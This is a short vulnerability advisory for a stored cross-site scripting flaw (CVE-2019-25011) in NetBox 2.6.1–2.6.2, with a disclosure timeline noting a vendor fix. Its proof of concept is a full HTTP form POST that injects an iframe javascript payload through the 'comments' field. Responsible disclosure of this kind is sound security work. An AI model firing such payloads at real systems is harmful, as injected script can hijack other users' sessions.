NetBox version: 2.6.1 -2.6.2 Cross-Site Scripting vulnerability
31-08-2019
Affected Product: NetBox version: 2.6.1 -2.6.2
Credits: Vulnerability discovered by Claudio Cinquino
CVE: CVE-2019-25011
Executive Summary
Netbox is vulnerable to stored XSS due to lack of filtration of user-supplied [Autenticated User]
Parameter:
name="comments" [ works on all pages where the parameter is present ]
PoC
|
POST /dcim/sites/add/ HTTP/1.1 Host: xxx User-Agent: xxx Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: xxx Content-Type: multipart/form-data; boundary=---------------------------57052814523281 Content-Length: 2158 Connection: close Cookie: csrftoken=xxx; sessionid=xxx Upgrade-Insecure-Requests: 1
-----------------------------57052814523281 Content-Disposition: form-data; name="csrfmiddlewaretoken"
xxxx
<snipped>
-----------------------------57052814523281 Content-Disposition: form-data; name="comments" <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
-----------------------------57052814523281 Content-Disposition: form-data; name="_create"
-----------------------------57052814523281--
|
Disclosure Timeline
31/08/2019 – Vulnerability Discovered
03/09/2019 – Initial vendor notification
09/10/2019 – The vendor fixed the vulnerability
References
[1] https://github.com/netbox-community/netbox/issues/3471